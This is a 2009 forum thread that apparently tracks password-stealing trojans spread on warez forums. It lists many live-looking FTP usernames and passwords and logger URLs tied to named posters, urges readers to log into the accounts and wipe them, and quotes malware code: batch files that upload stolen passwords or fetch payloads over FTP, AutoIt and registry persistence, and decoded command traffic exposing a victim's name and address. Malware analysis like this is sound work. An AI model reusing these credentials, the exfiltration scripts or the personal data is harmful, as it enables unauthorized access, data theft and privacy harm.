| Author | Message |
Vektor
2009-06-27 16:39:30 |
| Quote | The following accounts are currently used by iStealer trojans, HackHound Stealer trojans and keyloggers that are binded to other executable files linked from various forums and blogs.
- FTP accounts:
- ftp://194.8.74.120/, user: olyans@directransfer.net password: abas00
- ftp://194.8.74.120/, user: amine2@directransfer.net password: amine1
- ftp://67.228.200.14/public_html/Lolz/, user: hellboyz password: password
- ftp://94.23.41.37, user: slhkr911 password: @>/sgrox@3$.d9-
- ftp://errorlog.freewebhostingpro.com, user: errorlog password: error33
- ftp://fastdown.xyo.ro, user: fastdown.xyo.ro password: zionboghy
- ftp://ftp.1nj3ct3d.net, user: co_daniel@1nj3ct3d.net password: 12345678910
- ftp://ftp.at-mix.de/css/css/, user: atmix password: 231255
- ftp://bnetplace.freehostia.com, user: johsmi9674 password: 123456789123456789
- ftp://ftp.drivehq.com, user: ivone_sikandar password: ivone_sikandar
- ftp://ftp.drivehq.com, user: kodaroka password: sadandhappy
- ftp://ftp.drivehq.com, user: al3kl33t password: 1q2w3e
- ftp://ftp.drivehq.com, user: _Secret_ password: bryan123
- ftp://ftp.drivehq.com, user: dillyskye password: edwardthomas
- ftp://ftp.drivehq.com, user: haxzor699 password: h4cky0u
- ftp://ftp.drivehq.com, user: bukimp3 password: kulleri123
- ftp://ftp.drivehq.com, user: coreyspunks password: haha12
- ftp://ftp.drivehq.com, user: CsGhost password: letmein666
- ftp://ftp.drivehq.com, user: jasjohal password: gerrard8
- ftp://ftp.drivehq.com, user: krizhiel password: silentcurse
- ftp://ftp.drivehq.com, user: mohalammari1 password: 951992
- ftp://ftp.freehostia.com, user: benros10 password: 130393
- ftp://ftp.ftpwt.com, user: hitman543 password: anything
- ftp://ftp.imageaba.co.cc/public_html/xr, user: imaba01 password: ,#K=JG;wAia2Mq+
- ftp://ftp.isolative.com, user: allin@isolative.com password: sloboda89
- ftp://ftp.lickmytee.com, user: thug@lickmytee.com password: bhailog
- ftp://ftp.t35.com, user: runescape1349.t35.com password: runescape1349
- ftp://ftp.t35.com, user: gadbt.t35.com password: patarina
- ftp://ftp.t35.com, user: sashalol.t35.com password: kurac123
- ftp://ftp.t35.com, user: TonyHawkar.t35.com password: Adventure
- ftp://ftp.team-sa.org, user: teamsaor password: fkeDbU31zp
- ftp://ftp.da3wtoalkhaldeen.com, user: adrenaline@da3wtoalkhaldeen.com password: EHx&2|XF;M-<
- ftp://imagespa.ro, user: imagespa password: bKJz6=<4d1f.
- ftp://jackfruit.justfree.com, user: jackfruit password: h870881
- ftp://keyrnerl.no-ip.info:1210, user: olenka password: 6025241432{2D6F9C02-144F-A572-0408-060803080701}
- ftp://textx.freewhost.com, user: textx password: 123456
- ftp://www.freewebtown.com, user: gadbt password: makajj0
- ftp://76.73.37.130, user: sayem password: 123456
- ftp://ftp.rjlesser.com/etc/, user: rjles0 password: aloha5
- ftp://ftp.rickylesser.com/etc/, user: rickyles password: aloha5
Many of these accounts still work, and in some cases you don't have the right to delete files from them. Use FTP Log Cleaner if you want to overwrite / delete all logs.
- PHP Logger pages:
- E-mail accounts:
____________________
|
|
Vektor
2009-07-08 21:49:04 |
| Quote | More trojan FTP's , PHP logger pages and PPI trojan hosts:
- PHP loggers:
- PPI trojans:
- FTP's used by stealer trojans and keyloggers:
- ftp://kildogler.blackapplehost.com, user: kildogler password: maxpayne
This one also has rapidshare phishing page. I deleted the log with phished accounts.
- ftp://danfsleech.freehostia.com, user: danfer26 password: 2512834
Here there were rapidleech scripts and rapidshare phishing pages. I deleted them all.
| danfsleech.freehostia.com wrote: | <?php $file = "youcantfindmylogs.txt"; // rename *.txt $logon = "readlogs"; //pass to read logs $reset = "deletelogs"; // clears logs list function getIP() { $ip; if (getenv("HTTP_CLIENT_IP")) $ip = getenv("HTTP_CLIENT_IP"); else if(getenv("HTTP_X_FORWARDED_FOR")) $ip = getenv("HTTP_X_FORWARDED_FOR"); else if(getenv("REMOTE_ADDR")) $ip = getenv("REMOTE_ADDR"); else $ip = "UNKNOWN"; return $ip; } ?> |
|
ftp://mptrei.llc.nu, user: parola123 password: ascii This is the funniest trojan I've ever seen. If there was a contest for the stupidest trojan spreader this one is a winner. All programs posted by him extract in temp a nsis installer "cosmin.exe" and execute it. The installer extracts 3 "password fox" executables in temp and executes them. If there is any error getting any of your passwords you see a messagebox titled "password fox" telling you that it couldn't steal whatever passwords it couldn't. After that the installer extracts in temp a "QuickBatchCompiler" .exe which extracts the "compiled" .bat and executes it,
| bt34757.bat wrote: | @shift %TEMP%\dependencies.exe >> %TEMP%\%COMPUTERNAME%ff.txt %TEMP%\runtime.exe /stext %TEMP%\%COMPUTERNAME%ie7.txt netsh firewall add allowedprogram %SYSTEMROOT%\system32\ftp.exe "File Transfer Protocol" ENABLE @echo off set bat=%TEMP%\ftp.dat echo mptrei.llc.nu>> %bat% echo parola123>> %bat% echo ascii>> %bat% echo put %TEMP%\%COMPUTERNAME%ff.txt>> %bat% echo put %TEMP%\%COMPUTERNAME%ie7.txt>> %bat% echo quit>> %bat%
ftp -s:%TEMP%\ftp.dat mptrei.llc.nu
|
|
- ftp://softwareactivation.co.cc, user: software password: badboy
Everyone knows uTorrent is freeware and doesn't need to be activated by sending all your passwords to an FTP.
- ftp://78.140.147.237, user: yashiro password: 10cp1w0fb2
- ftp://ftp.drivehq.com, user: stewart94 password: nks2k7
- ftp://ftp.jaxxed.org, user: chrishdman@jaxxed.org password: chris
- ftp://ftp.justfree.com, user: fredick1 password: 1234512345
- ftp://ftp.lp-electric.com.my, user: system@lp-electric.com.my password: steaua
- ftp://ftp.tacal666.ta.ohost.de, user: tacal666 password: kriptonkripton
- ftp://ftp.kyrepairs.com, user: beaverlog password: A1s2d3f4g5h6j7
- ftp://ftp.free-php-scripts.org, user: ftw@free-php-scripts.org password: i5yvUa%H:<p;
- ftp://gadbt.justfree.com, user: gadbt password: makajj0
- ftp://www.freewebtown.com, user: gadbt password: makajj0
- ftp://leecherghacker.justfree.com, user: leecherghacker password: 111222
- ftp://216.246.99.227, user: accountsshitz@dad0ms.org password: 123UUaaee224steal
- ftp://shocktrooper.justfree.com, user: shocktrooper password: ExitProcess
- ftp://heart.justfree.com, user: heart password: air23heart
- ftp://ftphost.ripway.com, user: marado13 password: 934126857
- ftp://ftp.testme.ezeserv.com, user: vox@testme.ezeserv.com password: vox
- ftp://ftp.angelfire.com, user: pasdump password: rbGqYg5G
- ftp://cloud.prohosting.com, user: ace142 password: assass1
- ftp://94.23.41.37, user: Sansh09 password: <:Sanshika2#0@0$9logsrs:{]
- ftp://194.8.74.120, user: Greencrack@directransfer.net password: 14789563
|
|
Vektor
2009-07-13 21:44:29 |
| Quote | - PHP loggers:
- http://sages-spirit-wings.com/logs/
Source forum: http://backd00red.org, users: paper12 and pastaci01
- http://dedicatedhackers.com/logs/index.php
Source forum: http://sharemafia.com, user: Nick
- http://rizwanisboss.blackapplehost.com/index.php
Source forum: http://rapidbyte.org, user: BarNone
- http://rizwanisbest.6te.net/index.php
Source forum: http://realwarez.org, user: Modzas
- http://megauplaod.info/rapid/index.php
Forums:
- http://rapidgen.info/system32x/index.php
Source forum: http://rapidbyte.org, user: raydon
- http://91.214.44.123/~rapidrel/index.php
Source forum: http://rapidbyte.org, user: kdiz4sho
- http://warezbb.info/Dont_Bother/index.php
Source forum: http://realwarez.org, user: aussie ron
- http://testing-yeah.us/www/database-makaveli/index.php
Source forum: http://rapidbyte.org, user: OladjenPasulj
- http://testing-yeah.us/www/db001/index.php
Source forum: http://rapidbyte.org, user: tahuantinsuyo
- http://testing-yeah.us/www/neo.0.332/index.php
Source forum: http://rapidbyte.org, user: flyppi
- http://ajulid.blackapplehost.com/index.php
Source forum: http://rapidbyte.org, user: OladjenPasulj
- http://0xdead.co.cc/backup/index.php
Source forum: http://rapidbyte.org, user: qwerty420
- http://www.akshayw.justfree.com/index.php?action=add
Source forum: http://realwarez.org, user: madnessken
- http://jasakom.site90.net/mail.php
The trojan uses the mail.php script to send an e-mail to astaga123@gmail.com with a HackHound Stealer log. Source forum: http://realwarez.org, user: madnessken
- FTP accounts:
- ftp://ftp.drivehq.com, user: techhack , password: shreyas8910
Source forum: http://rapidbyte.org, user: manicamish
- ftp://ftp.drivehq.com, user: joshpk , password: bobba1
FTP paths: /IDM , / , encryption password: 19930521 Source forum: http://rapidbyte.org, user: Treesling
- ftp://tudmditektif.justfree.com, user: tudmditektif , password: 12345tuan
Source forum: http://realwarez.org, user: madnessken
- ftp://ftp.rs174.co.cc, user: mrockkz@rs174.co.cc , password: 1234567
Source forum: all forums where kat421 is registered
- ftp://testing.bplaced.net, user: testing , password: testing , path: /Istealer 4.0 Logs
Source forum: http://share4life.co.uk, user: MaleVolenT
- ftp://ftp.slimshady.athost.net, user: slimshady.athost.net , password: 123456010101
Source forum: http://share4life.co.uk, user: weaklinks
- ftp://94.23.41.37, user: slhkr911 , password: @>/sgrox@3$.d9-
Source forum: http://rapidbyte.org, user: boomshaka2009
- ftp://deathcrystal.justfree.com, user: deathcrystal , password: 000000 , the account was registered for momo93_999@hotmail.com name: Mohamed Habib
Source forum: http://pakwarez.com, user: flyppi
- ftp://kofta1993.blackapplehost.com, user: kofta1993 , password: 12341234 , the account was registered for anglegirle_1987@yahoo.com name: Mohamed Habib
Source forum: http://pakwarez.com, user: flyppi
- ftp://rspro007.blackapplehost.com, user: rspro007 , password: k28rspro@
On this FTP there were also Rapidshare phishing pages (the account was banned by blackapplehost staff). Source forum: http://pakwarez.com, user: rapid007
- ftp://ftp.drivehq.com, user: sundensingh , password: just1love , path: /nathankey
Source forum: http://pakwarez.com, user: apbsoft
- ftp://bnetplace.freehostia.com, user: johsmi9674 , password: 123456789123456789
Source forum: http://sharemafia.com, user: Kenwood
- ftp://ftp.drivehq.com, user: bukimp3 , password: kulleri123
Source forum: http://sharemafia.com, users: urani and monica21
- ftp://ftp.drivehq.com, user: sa3er6 , password: 123456
Source forum: http://sharemafia.com, user: King
- ftp://208.118.122.24, user: moneymoney , password: iwantmoney
FTP paths: /inno /spiral and / , the logs are encrypted with password: fuckmehard Source forum: http://backd00red.org, user: WarezUploader
- ftp://21backgroun.co.cc, user: tupact , password: m0N374ev9R
FTP path: /access , the logs are encrypted with password: faggotgetout Source forum: http://rapidbyte.org, user: comcas
- ftp://crawllis1.blackapplehost.com, user: crawllis1 , password: mylove1991
Source forum: http://warezforum.info, account e-mail: rapidcrawllis@gmail.com
- ftp://medikalalinsatin.com, user: medikalalin , password: 642664 , path: /httpdocs/images/images/
Source forum: http://backd00red.org, user: NoName
I've also found a fake codec on many forums (example: rapidbyte.org , poster: qwerty420) written in AutoIt and I decompiled it. The trojan downloads a list of ads and possible update links from http://www.r2514124a.info/0/t.binx.php?hid=$HARDWAREID
| $HARDWAREID wrote: | Func HARDWAREID() Local $_OS, $_BIOS, $_NET, $_PRO _COMPUTERGETOSS($_OS) _COMPUTERGETBIOS($_BIOS) _COMPUTERGETNETWORKCARDS($_NET) _COMPUTERGETPROCESSORS($_PRO) $SERIAL = $_OS[1][46] $BIOS_VERSION = $_BIOS[1][24] $MAC = $_NET[1][15] Return MD5($SERIAL & $BIOS_VERSION & $MAC) EndFunc |
|
| Quote: | Func INSTALL() $COPY = FileCopy(@ScriptFullPath, @AppDataDir & "\svchost.exe", 1) FileOpen(@AppDataDir & "\svchost.exe", 0) $REG = RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "*svchostBoot", "REG_SZ", '"' & @AppDataDir & '\svchost.exe"') If @ScriptName <> "svchost.exe" Then $A = GETAFFILIATEID() IniWrite($CONTROL_SAVE & "\save.ini", "stat", "credit", "False") IniWrite($CONTROL_SAVE & "\save.ini", "stat", "a", $A[1]) IniWrite($CONTROL_SAVE & "\save.ini", "stat", "s", $A[2]) GIVECREDIT($COPY, $REG) EndIf EndFunc |
|
| Quote: | While 1 Sleep(30) If TimerDiff($TAD) > $AD_DELAY Then $AD_CONTROL = IniRead($CONTROL_SAVE & "\control.ini", "ads", "url", "") If StringLeft($AD_CONTROL, 4) = "http" Then $AD_URL = _INETGETSOURCE($AD_CONTROL & "?version=" & $VERSION & "&name=" & @ScriptName & "&_=" & TIME()) If Not @error And StringLeft($AD_URL, 4) = "http" Then _RUNDOS("start " & $AD_URL) EndIf EndIf $AD_DELAY = IniRead($CONTROL_SAVE & "\control.ini", "ads", "delay", "40") $AD_DELAY = 1000 * 60 * $AD_DELAY $TAD = TimerInit() EndIf
|
|
|
|
Vektor
2009-07-17 21:06:42 |
| Quote | - PHP loggers:
- http://magano.justfree.com/index.php
Source forum: http://backd00red.org user: crash.override28
- http://moritz-verpackungen.eu/fileadmin/user_upload/pdf/logs.php
Source forum: http://rowarez.org user: alinrus
- http://myart-gallery.com/senm.php?data=
http://robert-art.com/senm.php?data= http://superarthome.com/senm.php?data= Source forums:
- http://john-doe.ch/inside/rapidshare.php?user= &content=
Source forum: http://rowarez.org user: benny_loppa
- http://72.253.185.148:81
Source forum: http://rowarez.org user: CODEX
- http://quakeon.ueuo.com/index.php
Source forum: http://wrzboard.org user: chadder57
- http://nemanjegej.ueuo.com/index.php
Source forum: http://wrzboard.org user: chadder57
- http://91.214.44.123/~rapidrel/index.php
Source forums: As usual, it's the same NeroStartSmart.exe extracted by a NSIS installer
- http://testing-yeah.us/www/db005/index.php
Source forum: http://rowarez.org user: Cyberbat
- http://testing-yeah.us/www/neo.0.332/index.php
Source forum: http://wrzboard.org user: mezuza
- http://rmws.blackapplehost.com/index.php
Source forum: http://wrzboard.org users: looky , uploadingas
- http://www.xtremewarez.us/yash/index.php
Source forum: http://warez-ape.com user: Akhil321
- http://rizwanisboss.blackapplehost.com/index.php
Source forum: http://warez-ape.com user: Akhil321
- http://rizwanisbest.6te.net/index.php
Source forum: http://wrzboard.org user: Meniu
- http://csghost1.oxyhost.com/index.php
Source forum: http://warez-ape.com user: chipkhan
- http://warezbb.info/Dont_Bother/index.php
Source forums:
- http://testing-yeah.us/www/db002/index.php
Source forum: http://warez-ape.com user: chipkhan
- http://vb.9inty9.com/index.php
Source forum: http://warez-ape.com user: leluoch77
- http://greatmarketingservices.com/in.php?url=5&affid=06000
Source forum: http://warez-ape.com users: Neo , Alternativer
- http://securitytoolspro.com/in.php?url=5&affid=06000
Source forum: http://warez-ape.com users: Neo , Alternativer
- http://access222.byethost31.com/submit.php?mode= &port=
Source forum: http://wrzboard.org user: n95tvout This trojan creates a proxy on a random port (for example 4642) and notifies the logger script The trojan creates a hi.bat in Temp and executes it, | hi.bat wrote: | | reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v WinsysMon /t REG_SZ /d "Socks.exe" /f > nul |
|
It checks the opened port using this address: http://www.utorrent.com/testport?port=4642 Of course, the trojan is written in Visual Basic and it installs MSWINSCK.OCX.
- http://hotsexinsports.com/ppi2/submit.php?mode= &port=
Source forum: http://wrzboard.org user: qazooo Same proxy trojan as above, different logger.
- http://www.itsrunbytools.com/s/WE/0035/info.php
Source forum: http://wrzboard.org user: billywizz This trojan gets "instructions" from www.itsrunbytools.com with what to do next. This is an example reply: | SSM.exe wrote: | GET /s/WE/0035/info.php HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Accept-Language: en-us Referer: Get Info Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Host: www.itsrunbytools.com Connection: Keep-Alive
|
|
| www.itsrunbytools.com wrote: | HTTP/1.1 200 OK Date: Wed, 15 Jul 2009 10:55:35 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.9 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html
260 U01MSU5LMWh0dHA6Ly94LmF6am1wLmNvbS8yYzl2ei xodHRwOi8vbnB2b3MuY29tL2NsaWNrLz9zPTczNzcyJmM9MTU2OTY3LGh0dHA6Ly9 sb2dpbi50cmFja2luZzEwMS5jb20vZXovY2lpaWV4cGxlaXplL yxodHRwOi8vbG9naW4udHJhY2tpbmcxMDEuY29tL2V6L2Fvb290d3 Bhdmx3cy8saHR0cDovL3guYXpqbXAuY29tLzJ0UHdXLGh0 dHA6Ly93d3cuZ3J0ZGwuY29tL3IuYXNwP2E9NDc4NzImbz01 MDY0JnNpPSxORVhUaHR0cDovL2J4eGouY29tLzYxOU5FW FRyZWR5b3VuZ0BvbXplc3QuY29tTkVYVExlb25hcmQkU3RlYXJu cyQ5MDFCZWxtb250IFJkJEJ1dGxlciRQQSQxNjAwMSQ3M jQkODQxJDAzNjIkMjAkOCQxOTQzTkVYVDI1TkVYVDFORVhUMU 5FWFREaXNhYmxlZE5FWFQxTkVYVFNJRS1TTDU1LzE0IFVQL kJyb3dzZXIvNi4xLjAuNS5jLjUgKEdVSSkgTU1QLzEuME5F WFQwTkVYVFNNMk5EMg==
|
|
| translation wrote: | | SMLINK1http://x.azjmp.com/2c9vz,http://npvos.com/click/?s=73772&c=156967,http://login.tracking101.com/ez/ciiiexpleize/,http://login.tracking101.com/ez/aoootwpavlws/,http://x.azjmp.com/2tPwW,http://www.grtdl.com/r.asp?a=47872&o=5064&si=,NEXThttp://bxxj.com/619NEXTredyoung@omzest.comNEXTLeonard$Stearns$901Belmont Rd$Butler$PA$16001$724$841$0362$20$8$1943NEXT25NEXT1NEXT1NEXTDisabledNEXT1NEXTSIE-SL55/14 UP.Browser/6.1.0.5.c.5 (GUI) MMP/1.0NEXT0NEXTSM2ND2 |
|
http://x.azjmp.com/2c9vz -> http://www.smileycentral.com/dl/index.jhtml?spu=true&partner=ZNxmk142&sub_id=19872&nsrc=az2&click_hash=211CIQvn http://npvos.com/click/?s=73772&c=156967 -> http://lwken.com/click/?s=73772&c=156967&internal=R_8vwqh_1 http://x.azjmp.com/2tPwW -> http://www.smileycentral.com/dl/index.jhtml?spu=true&partner=ZNxmk142&sub_id=19872&nsrc=az2&click_hash=111Ib94c http://www.grtdl.com/r.asp?a=47872&o=5064&si= -> geoip restricted http://login.tracking101.com/ez/aoootwpavlws/ -> geoip restricted http://bxxj.com/619 -> trojan spreader's blog :)
Next a logging script is called,
| SSM.exe wrote: | GET /s/WE/0035/adddid.php?did=1 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Host: www.itsrunbytools.com Connection: Keep-Alive
|
|
| www.itsrunbytools.com wrote: | HTTP/1.1 200 OK Date: Wed, 15 Jul 2009 10:56:04 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.9 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html
21 added:<br />1<br />89.123.135.106
|
|
For each opened link, another logging script is called,
| SSM.exe wrote: | GET /s/WE/0035/addstats.php?emailstring=redyoung@omzest.com&infostring=Leonard$Stearns$901Belmont%20Rd$Butler$PA$16001$724$841$0362$20$8$1943&submit=1&offer=x.azjmp.com/2c9vz HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: www.itsrunbytools.com Connection: Keep-Alive
|
|
Response:
| www.itsrunbytools.com wrote: | HTTP/1.1 200 OK Date: Wed, 15 Jul 2009 10:57:19 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.9 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html
be added:<br />x.azjmp.com/2c9vz<br />89.123.135.106<br />1<br />redyoung@omzest.com<br />Leonard$Stearns$901Belmont Rd$Butler$PA$16001$724$841$0362$20$8$1943<br />Wed, 15 Jul 09 05:57:19 -0500
|
|
All links are downloaded with http://bxxj.com/619 as referer.
| Quote: | GET /2c9vz HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Accept-Language: en-us User-Agent: SIE-SL55/14 UP.Browser/6.1.0.5.c.5 (GUI) MMP/1.0 Referer: http://bxxj.com/619 Accept-Encoding: gzip, deflate Host: x.azjmp.com Connection: Keep-Alive
|
|
The user-agent says all. This trojan has a GUI. To see it I used a "trick" in SoftICE, I didn't allow the thread that created it to be terminated :)
- E-mail accounts:
- FTP accounts:
|
|
Vektor
2009-07-25 11:39:49 |
| Quote | FTP accounts:
- ftp://ftp.drivehq.com, user: miromania1 , password: sosweety
Source forum: http://h4ck-y0u.org , user: DArkSmAsh
- ftp://0-zone.net, user: pzone0 , password: daddy1
Source forum: http://h4ck-y0u.org , user: Don Corleone
- ftp://gasser.justfree.com, user: gasser , password: 258456753
ftp://kofta1993.justfree.com, user: kofta1993 , password: 5020495 Source forums: http://warezscene.org , users: liverpool1892 and spinmax , and http://h4ck-y0u.org , user: Jadeli
- ftp://kofta1993.blackapplehost.com, user: kofta1993 , password: 12341234
ftp://deathcrystal.justfree.com, user: deathcrystal , password: 000000 Source forum: http://warezscene.org , user: ParadiseDuy
- ftp://ftp.drivehq.com, user: michael_myers , password: halloween
Source forum: http://h4ck-you.org , user: Michael_Myers
- ftp://ftp.drivehq.com, user: Michael_Myers , password: undertaker97
Source forum: http://h4ck-you.org , user: Michael_Myers
- ftp://rspro007.blackapplehost.com, user: rspro007 , password: k28rspro@
Source forums: http://warezvb.org , user: rapid007 and http://warezscene.org , user: megarspro First, I left a FTP Cleaner running for this FTP until the blackapplehost abuse team banned this account.
- ftp://copcoi2.com, user: copcoi2 , password: megatuan007 , paths: /public_html/a2 and /public_html/a1
Source forums: http://warezvb.org , user: rapid007 and http://warezscene.org , user: megarspro I left another FTP Cleaner for this one too.
- ftp://ftp.drivehq.com, user: rapid007 , password: mega007
Source forum: http://warezscene.org , user: megarspro - check the forum to see what a retard he is. This time he changed the binder he used, this new binder shows a nice messagebox with "Error at 0x44e85c" "Caused exception at 0x44e85c" , with "Yes" and "No" buttons. Again, the address was added to FTP Cleaner.
- ftp://ftp.drivehq.com, user: niK12S , password: buldozer
Source forum: http://warezvb.org , user: arbmal
- ftp://ftp.drivehq.com, user: raxit4u2 , password: passward
Source forum: http://1nj3ct.in , user: FuyuKitsune
- ftp://ankit007.blackapplehost.com, user: ankit007 , password: stealer
Source forum: http://1nj3ct.in , user: vaibhav2007
- ftp://ftp.t35.com, user: hackme1.t35.com , password: 111111
Source forum: http://warezscene.org , user: blackat
- ftp://ftp.drivehq.com, user: initiatedx , password: 121212
Source forum: http://warezscene.org , user: BlackDream
- ftp://ftp.warez-hacker.info, user: gorillazcs@warez-hacker.info , password: stgorillazz
Source forum: http://warezscene.org , user: FilipAlKapone
- ftp://ftp.justfree.com, user: fredick , password: 1234512345
Source forum: http://warezscene.org , user: fredrickkk
- ftp://ftp.t35.com, user: puredark.t35.com , password: voodooman123 , path: /Log1
Source forum: http://warezscene.org , user: hack4
- ftp://ftp.drivehq.com, user: kwijibo , password: pleasedonthack
ftp://ftp.drivehq.com, user: monkeyboy101 , password: hackmaster Source forum: http://warezscene.org , user: ilyess Two FTP's used by 2 different iStealers binded with same .exe.
- ftp://ftp.training-vanzari.ro, user: ballack@training-vanzari.ro , password: hackpediauser
Source forum: http://warezscene.org , user: Invalid Error All archives posted by this user have syncron.dll which is a renamed zip archive that has a java program and text data, the java program displays the included text data, which is the entire bible in romanian. Other FTP accounts owned by this religious trojan spreader: ftp://web-arts.org user: web-arts password: 123
ftp://node3.fdns.ro user: unite password: rfdns
ftp://ftp.training-vanzari.ro user: ballack@training-vanzari.ro password: hackpediauser
ftp://verde-n-fata.net user: verde password: vnf112358
ftp://gatehost.org user: root password: hackpediauser
ftp://dedicat.powerhost.ro user: 1337 password: akjdhas7896yjhmlmuie
ftp://sech0st.com user: sech0st password: 0722591559ftp
ftp://unu23.freehostia.com user: joagey password: 0188073
ftp://xgamess.com user: xgamess password: test
ftp://belale3.freehostia.com user: belale3 password: 3835699
- ftp://91.214.44.123 (eu25.altushost.com), user: domainc , password: shahrukhshahrukh
Source forum: http://warezscene.org , user: Kronix
- ftp://213.115.211.152, user: bot@platsportalen.se , password: g0tr00t
Source forum: http://warezscene.org , user: mafia03 This is not an account for logs, but for trojan updates. When I checked it it was offline. The trojan is spammed on forums as "Skype Credit Generator" which is a "compiled" .bat file that is extracted in Temp and executed,
| batchfile.bat wrote: | @ECHO OFF
echo **************************************** echo *** Skype Credit Generator By RuStik *** echo **************************************** echo Make sure this is in the same folder as skype's main .exe echo If all is well click anykey to generate credit! pause echo Generating credit this could take a min... echo Could not find right version of skype: Downloading... cd %systemroot% > ik ECHO bot@platsportalen.se >>ik ECHO g0tr00t >>ik ECHO binary >>ik ECHO get skype.exe >>ik ECHO quit FTP -v -s:ik 213.115.211.152 TYPE NUL >ik DEL ik skype.exe echo Check your account! Credit should be there if all went well! pause
|
|
- ftp://users.fulladsl.be, user: spb35068 , password: mb1992mb
Source forum: http://warezscene.org , user: maradoPT
- ftp://ftpserver.esmartdesign.com, user: linkers , password: 12345qwey
Source forum: http://warezscene.org , user: micro12
- ftp://194.8.74.120, user: moelebkr@directransfer.net , password: moeleb911
Source forum: http://warezscene.org , user: mohamed911 (his other accounts are for nick slhkr911)
- ftp://ftp.drivehq.com, user: nick2chocolate , password: h4cker
Source forum: http://warezscene.org , users: Pirated and sandiyo Local path to his project: D:\xHacker\Key Stealer\KeyStealer.vbp
- ftp://logovi.0catch.com, user: logovi.0catch.com , password: new1000
Source forum: http://warezscene.org , users: Pirated and sandiyo
- ftp://ftp.drivehq.com, user: agusthio4 , password: yuliana
Source forum: http://warezscene.org , user: pongo
- ftp://ftp.justfree.com, user: anabosbos2 , password: 0103545267 path: /TEST
Source forum: http://warezscene.org , user: Prinks This trojan also copies itself on USB drives
- ftp://ftp.t35.com, user: runescape1349.t35.com , password: runescape1349
Source forum: http://warezscene.org , user: SJshah
- ftp://yousufshah.no-ip.biz:3460
Source forum: http://warezscene.org , user: yousufsh
- ftp://ftp.1337hosting.org, user: istealer@1337hosting.org , password: MillsBucks
Source forum: http://warezscene.org , user: htp
- ftp://htp1.blackapplehost.com, user: htp1 , password: batista
Source forum: http://warezscene.org , user: htp
- ftp://ftp.testme.ezeserv.com, user: vox@testme.ezeserv.com , password: vox
Source forum: http://warezscene.org , user: devillived
- ftp://ftp.t35.com, user: dragonlee.t35.com , password: 1974esma1985
Source forum: http://warezscene.org , user: Don_Wiperko
- ftp://msshfh-msshfh.justfree.com, user: msshfh-msshfh , password: 000000000
Source forum: http://warezscene.org , user: huckle_berry
- ftp://www.0catch.com, user: iwbarcode.0catch.com , password: werock
Source forum: http://warezscene.org , user: iwbarcode This user uses the same binder as megarspro which shows a messagebox "Error at 0x44e85c" "Caused exception at 0x44e85c". Of course, you have to select "Yes" or "No" before any attempt to steal your passwords.
- ftp://ftp.drivehq.com, user: dillyskye101 , password: 01101981
Source forum: http://warezscene.org , user: sk0rpi0nas
- ftp://ftp.t35.com, user: runescape1349.t35.com , password: runescape1349
Source forum: http://warezscene.org , user: TheMsuper28
- ftp://ftp.0fees.net, user: fees0_3812110 , password: dragon
Source forum: http://warezscene.org , user: TuNiSiE This trojan shows a messagebox, "Keygens are illegal" - of course, it is a keygen.exe.
- ftp://ftp.t35.com, user: facebooksupport09377.t35.com , password: gandza path: mydir/myips/
Source forum: http://warezscene.org , user: deletedforever
- ftp://play14.justfree.com, user: play14 , password: friend
Source forum: http://warezscene.org , user: ian053189
- ftp://worthless.freewebhostx.com, user: worthless , password: worthless422
Source forum: http://warezscene.org , users: jaymm422 and waqar555 I've seen two trojans that use this account. The first one is a dotCRAP SFX which extracts in temp and executes many Nirsoft tools. If any of them fails (and on most systems they do), a default error message is shown and continuing from that point is useless. Also, for the trojan to send anything to this account (or else it crashes) you need to create a non-empty file c:\ClientRegistry.blob and a directory c:\SteamApps. If the trojan crashes and at least one Nirsoft tool remains in temp, this trojan will always crash before decrypting the FTP address (all dotCRAP trojans that extract Nirsoft tools in Temp crash if you start them again if any of these "tools" remains extracted there). The other trojan is a HackHound Stealer, binded with same program used by megarspro / rapid007 , that shows a messagebox with "Error at 0x44e85c" "Caused exception at 0x44e85c".
- ftp://fjux1.justfree.com, user: fjux1 , password: firefox
Source forum: http://warezscene.org , user: Offline1 Local path to trojan spreader's "stealer" project: C:\Documents and Settings\ZacK\Desktop\Zero\Stub\Project1.vbp , "Firefox Password Stealer FUD - Coded By: Zack".
- ftp://209.59.207.135, user: fx3media , password: dman1771
Source forum: http://warezscene.org , user: vagabond2411
- ftp://ftp.drivehq.com, user: hanisingh , password: dubaikadala
Source forum: http://warezscene.org , user: vagabond2411
PHP loggers:
- http://megauplaod.info/rapid/index.php
Source forum: http://warezvb.org user: Moby Master
- http://warezbb.info/Dont_Bother/index.php
